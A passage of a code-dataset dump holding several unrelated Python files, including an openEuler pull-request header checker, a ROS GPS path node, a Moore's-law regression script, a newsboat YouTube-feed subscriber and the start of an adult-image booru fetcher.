QtCore.Qt.Key_Escape:\n self.close()\n\n def test(self):\n\n self.ui.plainTextEdit_in_emiter_xyz.setPlainText('0,0,5\\n0,5,5\\n5,5,5\\n5,0,5')\n self.ui.lineEdit_in_emitter_normal.setText('0,0,-1')\n self.ui.lineEdit_in_receiver_location.setText('2.5,2.5,0')\n self.ui.lineEdit_in_receiver_normal.setText('0,0,1')\n self.ui.lineEdit_in_Q.setText('100')\n\n self.calculate()\n\n self.repaint()\n\n def calculate(self):\n\n # clear ui output fields\n self.ui.lineEdit_out_Phi.setText('')\n self.ui.lineEdit_out_q.setText('')\n self.ui.lineEdit_out_T.setText('')\n\n # parse inputs from ui\n emitter_points = int(self.ui.lineEdit_in_emitter_points.text())\n emitter_vertices = list()\n for i in [i.split(',') for i in str.strip(self.ui.plainTextEdit_in_emiter_xyz.toPlainText()).replace(' ', '').split('\\n')]:\n if len(i) == 0:\n continue\n i_ = list()\n for j in i:\n i_.append(float(j))\n emitter_vertices.append(i_)\n emitter_normal = [float(i) for i in self.ui.lineEdit_in_emitter_normal.text().split(',')]\n receiver_xyz = [float(i) for i in self.ui.lineEdit_in_receiver_location.text().split(',')]\n receiver_normal = [float(i) for i in self.ui.lineEdit_in_receiver_normal.text().split(',')]\n receiver_initial_temperature = float(self.ui.lineEdit_in_receiver_initial_temperature.text())\n Q = float(self.ui.lineEdit_in_Q.text())\n\n # calculate\n emitter_temperature = heat_flux_to_temperature(Q*1000)\n receiver_heat_flux, phi = single_receiver(\n ep_vertices=np.array(emitter_vertices),\n ep_norm=np.array(emitter_normal),\n ep_temperature=emitter_temperature,\n n_points=emitter_points, # number of hot spots\n rp_vertices=np.array(receiver_xyz),\n rp_norm=np.array(receiver_normal),\n rp_temperature=receiver_initial_temperature\n )\n\n # write results to ui\n self.ui.lineEdit_out_Phi.setText(f'{phi:.4f}')\n self.ui.lineEdit_out_q.setText(f'{receiver_heat_flux/1000:.2f}')\n self.ui.lineEdit_out_T.setText(f'{emitter_temperature:.2f}')\n\n # refresh ui\n self.repaint()\n","sub_path":"fseutil/gui/logic/dialog_0405_thermal_radiation_extreme.py","file_name":"dialog_0405_thermal_radiation_extreme.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"600833919","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/4/21 15:16\n# @FileName: tc-ci.py\n# @Software: PyCharm\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport click\nimport requests\nimport time\nimport re\nimport datetime\nimport traceback\nfrom functools import wraps\nfrom collections import defaultdict\nfrom urllib.parse import unquote\nfrom enum import Enum\n\n\nclass Errcode:\n CODE_0 = \"oEEP 文件头的类型需要为:{}\"\n CODE_1 = \"oEEP 文件头的状态需要为:{}\"\n CODE_2 = \"oEEP 文件头的编号不满足格式:oEEP-xxxx\"\n CODE_3 = \"oEEP 文件头的创建时间不满足格式YYYY-MM-DD\"\n CODE_4 = \"oEEP 文件头的修改时间不满足格式YYYY-MM-DD\"\n CODE_5 = \"oEEP 文件头必须在文件的第一行且必须满足---***---格式\"\n CODE_6 = \"oEEP 文件头的字段缺少:{}\"\n CODE_7 = \"oEEP 文件头的字段多余:{}\"\n CODE_8 = \"oEEP-0000 oEEP 索引.md文件缺少对应PR的索引\"\n\n def __init__(self):\n pass\n\n\ndef is_datetime(value):\n try:\n datetime.datetime.strptime(value, \"%Y-%m-%d\")\n return True\n except ValueError:\n return False\n\n\nclass GitConfig(Enum):\n group = \"openeuler\"\n repos = \"TC\"\n clone_cmd = \"git clone {} {}\"\n merge_cmd = \"git merge --no-edit pr_{n}\"\n checkout_cmd = \"git checkout -b working_pr_{n}\"\n fetch_cmd = \"git fetch {gitee_url} pull/{n}/head:pr_{n}\"\n checkout_branch_cmd = \"git checkout {}\"\n pull_cmd = \"git pull\"\n\n\nclass GlobalConfig(Enum):\n pr_info_url = \"https://gitee.com/{}/{}/pulls/{}.diff\"\n header = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0\"}\n relative_index_path = \"oEEP/oEEP-0000 oEEP 索引.md\"\n header_type = [\"特性变更\", \"信息整理\", \"流程设计\"]\n header_status = [\"初始化\", \"基本成型\", \"接纳\", \"活跃\", \"不活跃\", \"完成\", \"撤回\", \"拒绝\", \"被替代\"]\n header_lambda = {\n \"标题\": lambda x: \"\",\n \"类别\": lambda x: \"\" if x in GlobalConfig.header_type.value else Errcode.CODE_0.format(\n \",\".join(GlobalConfig.header_type.value)),\n \"摘要\": lambda x: \"\",\n \"作者\": lambda x: \"\",\n \"状态\": lambda x: \"\" if x in GlobalConfig.header_status.value else Errcode.CODE_1.format(\n \",\".join(GlobalConfig.header_status.value)),\n \"编号\": lambda x: \"\" if re.match(r\"oEEP-\\d\\d\\d\\d\", x) else Errcode.CODE_2,\n \"创建日期\": lambda x: \"\" if is_datetime(x) else Errcode.CODE_3,\n \"修订日期\": lambda x: \"\" if is_datetime(x) else Errcode.CODE_4,\n }\n\n\ndef func_retry(tries=3, delay=1):\n \"\"\"retry func\"\"\"\n\n def deco_retry(fn):\n @wraps(fn)\n def inner(*args, **kwargs):\n for i in range(tries):\n try:\n return fn(*args, **kwargs)\n except Exception as e:\n print(\"func_retry:{} e:{} traceback: {}\".format(fn.__name__, e, traceback.format_exc()))\n time.sleep(delay)\n else:\n raise RuntimeError(\"func_retry:{} over tries, failed\".format(fn.__name__))\n\n return inner\n\n return deco_retry\n\n\ndef execute_cmd3(cmd, timeout=30, err_log=True):\n \"\"\"execute cmd\"\"\"\n try:\n print(\"execute_cmd3 call cmd: %s\" % cmd)\n p = subprocess.Popen(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True, close_fds=True)\n t_wait_seconds = 0\n while True:\n if p.poll() is not None:\n break\n if timeout >= 0 and t_wait_seconds >= (timeout * 100):\n p.terminate()\n return -1, \"\", \"execute_cmd3 exceeded time {0} seconds in executing: {1}\".format(timeout, cmd)\n time.sleep(0.01)\n t_wait_seconds += 1\n out, err = p.communicate()\n ret = p.returncode\n if ret != 0 and err_log:\n print(\"execute_cmd3 cmd %s return %s, std output: %s, err output: %s.\", cmd, ret, out, err)\n return ret, out, err\n except Exception as e:\n return -1, \"\", \"execute_cmd3 exceeded raise, e={0}, trace={1}\".format(e.args[0], traceback.format_exc())\n\n\n@func_retry(tries=3, delay=2)\ndef request_pr_info(url):\n \"\"\"request pr info\"\"\"\n ret = requests.get(url, headers=GlobalConfig.header.value, timeout=(30, 30))\n if not str(ret.status_code).startswith(\"2\") and not str(ret.status_code).startswith(\"3\"):\n raise Exception(\"request pr info failed: {}--->{}\".format(url, ret.status_code))\n else:\n return ret.content\n\n\ndef parse_pr_info(content):\n \"\"\"Parse the PR information to be submitted\"\"\"\n path_list = list()\n content = content.decode(\"utf-8\")\n content_list = re.findall(\"diff --git(.*?)\\n\", content)\n for content in content_list:\n path = content.split(\"b/\")[-1].strip()\n path = path.replace('\"', \"\")\n if path.startswith(\"oEEP/oEEP-\") and not path.startswith(\"oEEP/oEEP-0000\"):\n path_list.append(path)\n return list(set(path_list))\n\n\ndef parse_index_info(content):\n \"\"\"parse index from oEEP/oEEP-0000 oEEP 索引.md\"\"\"\n try:\n content = content.split(\"## 索引:\")[-1].split(\"## oEEP 类型分类:\")[0].strip()\n list_title = re.findall(r\"\\((.*?)\\)\", content)\n return [unquote(title, \"utf-8\") for title in list_title]\n except IndexError:\n return list()\n\n\ndef read_content(path):\n \"\"\"read content from path\"\"\"\n with open(path, \"r\") as f:\n return f.read()\n\n\ndef ci_check(pr_id, path):\n \"\"\"ci check tc\"\"\"\n # 1.Get the path of the modified file from pr.diff\n print(\"-\" * 25 + \"start to parse pr-{}\".format(pr_id) + \"-\" * 25)\n url = GlobalConfig.pr_info_url.value.format(GitConfig.group.value, GitConfig.repos.value, pr_id)\n pr_content = request_pr_info(url)\n list_file_path = parse_pr_info(pr_content)\n # 2.read content from oEEP/oEEP-0000 oEEP 索引.md\n print(\"-\" * 25 + \"start to parse oEEP/oEEP-0000 oEEP 索引.md\" + \"-\" * 25)\n abs_index_path = os.path.join(path, GlobalConfig.relative_index_path.value)\n index_content = read_content(abs_index_path)\n list_index_path = parse_index_info(index_content)\n # 3.Read the information submitted by PR\n print(\"-\" * 25 + \"start to check pr info\" + \"-\" * 25)\n dict_content = dict()\n for file_path in list_file_path:\n cur_path = str()\n abs_path = os.path.join(path, file_path)\n dir_name = os.path.dirname(abs_path)\n file_name = os.path.basename(abs_path)\n prefix_file_name = file_name.split(\" \")[0]\n for dir_path, _, filenames in os.walk(dir_name):\n for filename in filenames:\n if filename.startswith(prefix_file_name):\n cur_path = os.path.join(dir_path, filename)\n if not cur_path:\n print(\"The current path:{} is not exist.\".format(file_path))\n continue\n base_name = os.path.basename(cur_path)\n dict_content[base_name] = read_content(cur_path)\n dict_error_result = defaultdict(list)\n for file_name, content in dict_content.items():\n if file_name not in list_index_path:\n dict_error_result[file_name].append(Errcode.CODE_8)\n file_hearder = re.match(r\"---\\n(.*\\n)+---\", content)\n if file_hearder:\n meta_data = file_hearder.group()\n exist_key = list()\n for meta in meta_data.split(\"\\n\"):\n if \":\" not in meta:\n continue\n key, content = meta.split(\":\")\n key, content = key.strip(), content.strip()\n msg = GlobalConfig.header_lambda.value.get(key) and GlobalConfig.header_lambda.value[key](content)\n if msg:\n dict_error_result[file_name].append(msg)\n exist_key.append(key)\n need_keys = GlobalConfig.header_lambda.value.keys()\n lack = set(need_keys) - set(exist_key)\n if lack:\n msg = Errcode.CODE_6.format(\",\".join(list(lack)))\n dict_error_result[file_name].append(msg)\n redundancy = set(exist_key) - set(need_keys)\n if redundancy:\n msg = Errcode.CODE_7.format(\",\".join(list(redundancy)))\n dict_error_result[file_name].append(msg)\n else:\n dict_error_result[file_name].append(Errcode.CODE_5)\n print(\"-\" * 25 + \"start to output result\" + \"-\" * 25)\n for file_name, err_msg in dict_error_result.items():\n print(\"\\033[31mCheck file:{} fail!\\033[0m\".format(file_name))\n print(\"\\033[31mThe reason is:{}\\033[0m\".format(\",\".join(err_msg)))\n if dict_error_result.keys():\n return True\n\n\ndef local_repo_name(group, repo_name, pull_id):\n \"\"\"\n combine name to avoid name conflit\n \"\"\"\n return \"{}_{}_{}\".format(group, repo_name, pull_id)\n\n\n@func_retry()\ndef prepare_env(work_dir, group, repo_name, pull_id, local_path, branch=\"master\"):\n \"\"\"\n prepare local reposity base and PR branch\n Notice: this will change work directory,\n action related to obtain path need do before this.\n \"\"\"\n if not os.path.exists(work_dir):\n os.makedirs(work_dir)\n repo = group + \"/\" + repo_name\n gitee_url = \"https://gitee.com/{repo}.git\".format(repo=repo)\n if os.path.exists(local_path):\n print(\"WARNING: %s already exist, delete it.\" % local_path)\n shutil.rmtree(local_path)\n ret, out, err = execute_cmd3(GitConfig.clone_cmd.value.format(gitee_url, local_path))\n if ret != 0:\n print(\"Failed to git clone {}, err:{}, out:{}\".format(gitee_url, err, out))\n return 1\n os.chdir(local_path)\n ret, _, _ = execute_cmd3(GitConfig.checkout_branch_cmd.value.format(branch))\n if ret != 0:\n print(\"Failed to checkout %s branch\" % branch)\n return 1\n ret, _, _ = execute_cmd3(GitConfig.pull_cmd.value)\n if ret != 0:\n print(\"Failed to update to latest commit in %s branch\" % branch)\n return 1\n ret, _, _ = execute_cmd3(GitConfig.fetch_cmd.value.format(gitee_url=gitee_url, n=pull_id))\n if ret != 0:\n print(\"Failed to fetch PR:{n}\".format(n=pull_id))\n return 1\n ret, _, _ = execute_cmd3(GitConfig.checkout_cmd.value.format(n=pull_id))\n if ret != 0:\n print(\"Failed to create working branch working_pr_{n}\".format(n=pull_id))\n return 1\n ret, _, _ = execute_cmd3(GitConfig.merge_cmd.value.format(n=pull_id))\n if ret != 0:\n print(\"Failed to merge PR:{n} to branch:{base}\".format(n=pull_id, base=branch))\n return 1\n return 0\n\n\n@click.command()\n@click.option(\"--pr_id\", help=\"the pr_id of git\")\n@click.option(\"--work_dir\", help=\"the work dir\")\ndef main(pr_id, work_dir):\n if not pr_id:\n raise RuntimeError(\"invalid pr_id\")\n if not work_dir or not os.path.exists(work_dir):\n raise RuntimeError(\"invalid work_dir\")\n group = GitConfig.group.value\n repo_name = GitConfig.repos.value\n local_repo_path = local_repo_name(group, repo_name, pr_id)\n local_path = os.path.join(work_dir, local_repo_path)\n result = prepare_env(work_dir, group, repo_name, pr_id, local_path)\n if result:\n print(\"prepare env failed\")\n sys.exit(-1)\n result = ci_check(pr_id, local_path)\n if os.path.exists(local_path):\n shutil.rmtree(local_path)\n if result:\n sys.exit(-1)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"ci/tools/tc-ci/tc-ci.py","file_name":"tc-ci.py","file_ext":"py","file_size_in_byte":11370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"442770279","text":"import numpy as np\nimport matplotlib.pyplot as plt\nnp.set_printoptions(precision=12)\nnp.set_printoptions(suppress=True)\ndef readrow(row, cols): \n data = np.fromstring(row, sep=' ')\n data.resize((cols,))\n return data\nnum_lev=21\nnum_mut=20\n\ndirectory='correct_alpha_0.020_beta_0.70_mu_1.0e-05_exp9_1.20/'\ncp_time=np.zeros(1)\nbc_per=np.zeros(1)\ntotal_per=np.zeros(1)\ntotal_time=np.zeros(1)\nfor i in range(1,2000):\n file=directory+'blood_'+str(i)+'.txt'\n try:\n with open(file) as f:\n data=np.array([readrow(row, (num_mut+1)*num_lev+1) for row in f])\n except:\n continue\n time_array=data[:,0]/365.0\n dict_leuke=np.empty((num_lev,),dtype=object) \n for i in range(num_lev):\n dict_leuke[i]=[k+i for k in range(1,(num_mut+1)*num_lev+1,num_lev)]\n total_leuke_blood=np.empty((num_lev,),dtype=object)\n for i in range(0,num_lev):\n total_leuke_blood[i]=np.sum(data[:,dict_leuke[i]],axis=1)\n total_wbc=np.sum(data[:,1:],axis=1)\n long=np.shape(total_leuke_blood[0])[0]\n bcr_abl_cells=np.zeros((long,num_lev))\n for k in range(0,long):\n for i in range(0,num_lev):\n bcr_abl_cells[k,i]=total_leuke_blood[i][k]/total_wbc[k]\n total_per=np.append(total_per,np.amax(bcr_abl_cells[-1,17]*100))\n bp_init=np.argmax(-np.diff(bcr_abl_cells[:,17]*100)>0)\n bc_per=np.append(bc_per,bcr_abl_cells[bp_init-10,17]*100)\n bc_per_var=bcr_abl_cells[bp_init-10,17]*100\n total_time=np.append(total_time,time_array[-1])\n if bc_per_var>50:\n print(bc_per_var,file)\n print(time_array[-1],file)\n if time_array[-1]>19.9:\n print(time_array[-1],file)\n if np.amax(bcr_abl_cells[:,17])*100>10.0:\n cp_time_var=time_array[bcr_abl_cells[:,17]*100>10.0][0]-time_array[bcr_abl_cells[:,17]*100>0.0][0]\n cp_time=np.append(cp_time,cp_time_var)\nbc_per=np.delete(bc_per,0)\ntotal_time=np.delete(total_time,0)\nbins=20\nplt.hist(total_time,bins)\nplt.title('a')\nplt.figure(1)\nplt.hist(bc_per,bins,color='blue')\nplt.title('Blast percentage when critical mutation appears',fontsize=20)\nplt.xlabel('Time (years)',fontsize=20)\nplt.ylabel('Number of patients',fontsize=20)\nplt.tick_params(axis='both',labelsize='xx-large')\nplt.figure(2)\ncp_time=np.delete(cp_time,0)\ntotal_per=np.delete(total_per,0)\nplt.hist(cp_time,bins,color='blue')\nplt.title('Duration of chronic phase',fontsize=20)\nplt.xlabel('Time (years)',fontsize=20)\nplt.ylabel('Number of patients',fontsize=20)\nplt.tick_params(axis='both',labelsize='xx-large')\nplt.figure(3)\nplt.hist(total_per,bins)\nplt.title('total_per')\nplt.hist(cp_time,bins,color='blue')\nplt.figure(4)\n","sub_path":"global_data_analysis.py","file_name":"global_data_analysis.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"418529722","text":"from __future__ import print_function\n\nimport os\nimport unittest\nimport mock\n\nimport imp\nimp.load_source('parse_changelog',\n os.path.join(os.path.dirname(__file__),\n '..', 'bin', 'parse_changelog'))\n\nimport parse_changelog\n\nclass ChangelogRstSamplesTest(unittest.TestCase):\n\n maxDiff = None\n\n def test_sample_full(self):\n sample = \"\"\"\nChangelog for package foo\n=========================\n\n0.1\n===\n\n0.1.27\n^^^^^^\n\n- dash for bullet list\n\n.. rst comment\n\n0.1.26\n^^^^^^\n\n.. DANGER:: Do not read this\n\n.. |reST| replace:: reStructuredText\n\n* substitutions in |reST|\n\nCopyright |copy| 2003\n\n.. |copy| unicode:: 0xA9 .. copyright sign\n\n+ using + for bullet list, and reference `Python `_\n+ second element *emphasized*\n\n0.1.4\n=====\n\ntext without bullet list\n\n0.1.3 (unstable)\n================\n\nsection title with added comment\n\"\"\"\n result = parse_changelog.get_version_sections(sample)\n result_no_sections = [(title, elements) for (title, elements, _) in result]\n self.assertEqual(\n [(u'0.1.27',\n [u'dash for bullet list']),\n (u'0.1.26',\n [u'substitutions in reStructuredText',\n u'Copyright \\xa9 2003',\n u'using + for bullet list, and reference `Python `_',\n u'second element *emphasized*']),\n (u'0.1.4', [u'text without bullet list']),\n (u'0.1.3', [u'section title with added comment'])],\n result_no_sections)\n","sub_path":"test/sample_test.py","file_name":"sample_test.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"384875062","text":"#! /usr/bin/env python\n\nimport rospy\n#import tf\nimport numpy as np\nimport time\nimport rospkg\nfrom sensor_msgs.msg import NavSatFix\nfrom sensor_msgs.msg import Imu\nfrom geometry_msgs.msg import PoseStamped\nfrom nav_msgs.msg import Path\nfrom std_msgs.msg import Float32\n#import tf2_ros\nfrom pyproj import Proj\nfrom pyproj import transform\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler\n#from geometry_msgs.msg import TransformStamped\n#from tf.transformations import euler_from_quaternion, quaternion_from_euler\n\nfrom gps_common import *\nimport copy\nfrom math import *\n\nWGS84 = { 'proj':'latlong', 'datum':'WGS84', 'ellps':'WGS84', }\nGRS80 = { 'proj':'tmerc', 'lat_0':'38', 'lon_0':'127', 'k':1, 'x_0':0,\n 'y_0':0, 'ellps':'GRS80', 'units':'m' }\n#'lat_0':'38.000036', 'lon_0':'127.00038'\ndef grs80_to_wgs84(x, y):\n return transform( Proj(**GRS80), Proj(**WGS84), x, y )\n\ndef wgs84_to_grs80(x, y):\n return transform( Proj(**WGS84), Proj(**GRS80), y, x )\n'''\ndef pub_tf_transform(lat,lon):\n br = tf2_ros.TransformBroadcaster()\n t = TransformStamped() # pose of turntable_frame w.r.t. turntable_base\n t.header.stamp = rospy.Time.now()\n t.header.frame_id = 'world'\n t.child_frame_id = 'GPS_link'\n t.transform.translation.x = lat\n t.transform.translation.y = lon\n t.transform.translation.z = 0\n t.transform.rotation.x = 0\n t.transform.rotation.y = 0\n t.transform.rotation.z = 0\n t.transform.rotation.w = 1\n br.sendTransform(t)\n'''\ndef gps_callback(data):\n global lat, lon, utm_lat_lon\n\n #print(odom_x)\n lat = data.latitude\n lon = data.longitude\n #print(lat, lon)\n utm_lat_lon = wgs84_to_grs80(lat, lon)\n\ndef imu_callback(data):\n global imu_yaw\n imu_quaternion = [data.orientation.x, data.orientation.y, data.orientation.z, data.orientation.w]\n\n roll, pitch, imu_yaw = euler_from_quaternion (imu_quaternion)\n imu_yaw=imu_yaw*180/np.pi\n #print(imu_yaw)\n\ndef speed_callback(data):\n global speed\n\n speed = data.data/36\n\ndef find_gps_step(last_step, cur_gps):\n min_length=100\n cur_step=0\n\n for step_gps in range(last_step-4):\n gps_n = gps_data[step_gps].split(',')\n gps_n_1 = gps_data[step_gps+1].split(',')\n gps_n_2 = gps_data[step_gps+2].split(',')\n\n\n # gps_n = [float(gps_n[0]) - float(gps_origin[0]), float(gps_n[1]) - float(gps_origin[1])]\n # gps_n_1 = [float(gps_n_1[0]) - float(gps_origin[0]), float(gps_n_1[1])- float(gps_origin[1])]\n gps_n = [float(gps_n[0]), float(gps_n[1])]\n gps_n_1 = [float(gps_n_1[0]), float(gps_n_1[1])]\n gps_n_2 = [float(gps_n_2[0]), float(gps_n_2[1])]\n\n\n utm_gps_n = wgs84_to_grs80(gps_n[0],gps_n[1])\n utm_gps_n_1 = wgs84_to_grs80(gps_n_1[0],gps_n_1[1])\n utm_gps_n_2 = wgs84_to_grs80(gps_n_2[0],gps_n_2[1])\n utm_gps_cur = wgs84_to_grs80(lat,lon)\n\n length1 = sqrt((utm_gps_cur[0]-utm_gps_n[0])**(2)+(utm_gps_cur[1]-utm_gps_n[1])**(2))\n length2 = sqrt((utm_gps_cur[0]-utm_gps_n_1[0])**(2)+(utm_gps_cur[1]-utm_gps_n_1[1])**(2))\n\n length = length1+length2\n '''\n line_data_x=[utm_gps_n[0],utm_gps_n_1[0],utm_gps_n_2[0]]\n line_data_y=[utm_gps_n[1],utm_gps_n_1[1],utm_gps_n_2[1]]\n fp1 = np.polyfit(line_data_x,line_data_y,1)\n y= fp1[0]*step_gps+fp1[1]\n length=abs(fp1[0]*utm_gps_cur[0] - utm_gps_cur[1] + fp1[1])/sqrt(fp1[0]**(2)+(-1)**(2)) #find length\n '''\n\n if(length=10) and speed>=1.8 and abs(d_theta)<=1.5):\n theta_error_count+=1\n\n if(theta_error_count>=20):\n adjust_yaw_sign=True\n theta_error_count=0\n else:\n theta_error=imu_yaw-gps_theta2\n theta_error_count=0\n\n\n #print(pathmsg.poses[step_gps].pose.position.x)\n\n #pub_utm_cur_gps(utm_lat_lon[0], utm_lat_lon[1])\n #pub_tf_transform(lat,lon)\n\n else:\n pass","sub_path":"autonomous-vehicle-MDS/stauto_sensor/src/global_path_ver3.py","file_name":"global_path_ver3.py","file_ext":"py","file_size_in_byte":9039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"104019400","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 9 16:58:02 2020\n\n@author: ablusenk\n\"\"\"\n\nimport re \nimport pandas as pd \nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnon_decimat = re.compile(r'[^\\d]+')\n\nds = pd.read_csv(\"/Users/ablusenk/GitHub/udemy/machine_learning_examples/linear_regression_class/moore.csv\",\n names = [\"Processor\", \"Transistors\", \"Year\", \"Vendor\", \"Technology\", \"Footprint\"], sep = \"\\t\", error_bad_lines=False)\n\n\n# ========================================================================== #\n# cleaning data to keep only digits \n# converting each value in int\nY = ds.Transistors\npat = r\"\\[.*\\]|\\D\"\nY = Y.str.replace(pat, '', regex = True)\nY = pd.to_numeric(Y)\n\n\n# cleaning data same way\nX = ds.Year\nX = X.str.replace('\\[.*\\]', '', regex = True)\nX = pd.to_numeric(X) \n\n\n# ========================================================================== #\n# Year/Transistors scatterplot\n# ticks removed not to crowd plot\n\n#THIS PLOT REMOVED, otherwise two plotted in one... shitty\nplt.scatter(X, Y)\nplt.xlabel(\"Year\")\nplt.ylabel(\"Transistors\")\nplt.xticks([])\nplt.yticks([])\nplt.show()\n\n# converting Y (Transistor) to log to get linear regression\nY = np.log(Y)\n\nplt.scatter(X,Y)\nplt.xlabel(\"Year\")\nplt.ylabel(\"Transistors\")\nplt.title(\"Linear Reg of Moore\")\nplt.xticks([])\nplt.yticks([])\nplt.show()\n\n\n# ========================================================================== #\n# Solving linear regression problem for logarithmic Y\ndenominator = X.dot(X) - X.mean() * X.sum()\na = ( X.dot(Y) - Y.mean() * X.sum() ) / denominator\nb = ( Y.mean() * X.dot(X) - X.mean() * X.dot(Y) ) / denominator\n\nY_pred = a * X + b\n\n\n# ========================================================================== #\n# calculating R-squared for linear regression\nd1 = Y - Y_pred\nd2 = Y - Y.mean()\nR_sq = 1 - (d1.dot(d1) / d2.dot(d2))\n\n\nplt.scatter(X,Y)\nplt.plot(X, Y_pred)\nplt.xlabel(\"Year\")\nplt.ylabel(\"Transistors\")\nplt.title(\"Linear Reg of Moore\")\nplt.xticks([])\nplt.yticks([])\nplt.show()\n\nprint(\"R-squared for particular problem is:\", R_sq)\n\n\n# ========================================================================== #\n# find time to double (in accordance with M oore's law) number of transistors\n# this will be our X2\n# log(Transistors) = a*X + b \n# ...now taking log of both sides \n# Transistors = exp(b) * exp(a * X)\n# 2*Transistors = 2 * exp(b) * exp(a * X) = exp(ln(2)) * exp(b) * exp(a * X)\n# = exp(b) * exp(a * X + ln(2))\n# ...or \n# exp(b) * exp(a * X2) = exp(b) * exp(a * X + ln(2))\n# ...or \n# a * X2 = a * X + ln(2)\n# ...or \n# X2 = X + ln(2)/a\nprint(\"Time to double number of transistors is:\", np.log(2)/a, \"years\") \n\n","sub_path":"linear_regression_class/moore_abl.py","file_name":"moore_abl.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"265890514","text":"import requests\nimport bs4\nimport sys\nimport os\n\ndef main():\n\n\tif len(sys.argv) == 1:\n\t\tprint('subscribe [...]')\n\t\tsys.exit(0)\n\n\thome_dir = os.environ['HOME']\n\twith open(f'{home_dir}/.newsboat/urls', 'a+') as urls_file:\n\t\turls_file.seek(0)\n\n\t\texisting_channel_ids = set()\n\t\tfor line in urls_file.readlines():\n\t\t\tline = line.rstrip()\n\t\t\texisting_channel_ids.add(line[52:76])\n\n\t\tfor url in sys.argv[1:]:\n\n\t\t\tr = requests.get(url)\n\t\t\thtml_source = r.text\n\n\t\t\tsoup = bs4.BeautifulSoup(html_source, 'html.parser')\n\t\t\t\n\t\t\tchannel_name = soup.find(\"meta\", {\"property\":\"og:title\"})['content']\n\n\t\t\tlinks = soup.findAll('link', href=True)\n\t\t\tfor link in links:\n\t\t\t\t\n\t\t\t\tif link['href'].startswith('https://www.youtube.com/channel/'):\n\t\t\t\t\txml = 'https://www.youtube.com/feeds/videos.xml?channel_id='\n\t\t\t\t\tchannel_id = link['href'][32:]\n\n\t\t\t\t\tif channel_id in existing_channel_ids:\n\t\t\t\t\t\tprint('You are already subscribed to ' + channel_name)\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\t\tline_item = f'{xml}{channel_id} \"~{channel_name}\"'\n\t\t\t\t\turls_file.write('\\n' + line_item)\n\t\t\t\t\texisting_channel_ids.add(channel_id)\n\t\t\t\t\tprint('Added to newsboat: ')\n\t\t\t\t\tprint(line_item)\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint('Channel ID not found. Unable to add to newsboat')\n\n","sub_path":"package_src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"474715768","text":"\"\"\"\nNSFW functions\n\"\"\"\nfrom random import choice\nfrom typing import List, Optional, Tuple\n\nfrom aiohttp import ClientSession, ClientResponseError\nfrom requests import get\nfrom xmltodict import parse\n\nfrom data_controller.tag_matcher import TagMatcher\nfrom scripts.helpers import aiohttp_get, flatten\n\n__all__ = ['get_lewd', 'greenteaneko']\n\n\ndef __parse_query(query: Tuple[str]) -> tuple:\n \"\"\"\n Helper function to parse user search query.\n :param query: the search query.\n :return: (list of tags, rating)\n \"\"\"\n rating = None\n tags = []\n for q in query:\n if q[:8].lower() in ('rating:s', 'rating:e', 'rating:q'):\n rating = q.lower()\n else:\n tags.append(q)\n return tags, rating\n\n\ndef __combine(rating, join_str, *tags: List[str]) -> str:\n \"\"\"\n Combine a rating string and multiple tag lists into a single search\n string.\n :param rating: the rating.\n :param join_str: the character to join the list.\n :param tags: the lists of tags.\n :return: a single search string.\n \"\"\"\n if rating:\n return join_str.join(flatten(tags) + [rating])\n return join_str.join(flatten(tags))\n\n\ndef __process_queries(\n site: str, tags: List[str], tag_matcher: TagMatcher) -> tuple:\n \"\"\"\n Process a list of tags to separate them into two lists.\n :param site: the site of the tags\n :param tags: the list of tags.\n :param tag_matcher: the TagMatcher object.\n :return: two lists of tags. The first one are the list of tags that are\n in the db, the second one are the list of tags that aren't in the db.\n \"\"\"\n safe_queries = []\n unsafe_queries = []\n for q in tags:\n if tag_matcher.tag_exist(site, q):\n safe_queries.append(q)\n else:\n unsafe_queries.append(q)\n return safe_queries, unsafe_queries\n\n\nasync def __request_lewd(\n tags: List[str], rating: Optional[str], url: str,\n site: str, session: ClientSession, tag_matcher: TagMatcher) -> tuple:\n \"\"\"\n Make an HTTP request to a lewd site.\n :param tags: the list of tags for the search.\n :param rating: the rating of the search.\n :param url: the request url.\n :param site: the site name.\n :param session: the aiohttp ClientSession\n :param tag_matcher: the TagMatcher object.\n :return: a tuple of\n (request response, tags that are in the TagMatcher db,\n tags that are not in the TagMatcher db)\n :raises: ClientResponseError if the status code isnt 200\n \"\"\"\n safe_queries, unsafe_queries = __process_queries(\n site, tags, tag_matcher)\n combined = __combine(rating, '%20', safe_queries, unsafe_queries)\n\n # FIXME: gelbooru doesn't play nice with aiohttp\n if site == 'gelbooru':\n res = get(url + combined)\n if res.status_code != 200:\n raise ClientResponseError\n else:\n res = await aiohttp_get(url + combined, session, False)\n return res, safe_queries, unsafe_queries\n\n\nasync def __parse_result(response, site: str) -> list:\n \"\"\"\n Parse the HTTP response of a search and return the post list.\n :param response: the HTTP response.\n :param site: the site name.\n :return: The list of posts.\n \"\"\"\n if site == 'gelbooru':\n res = parse(response.text)['posts']\n if 'post' in res and res['post']:\n return res['post']\n else:\n return await response.json()\n\n\ndef __parse_post_list(\n post_list: list, url_formatter: callable, tag_key) -> 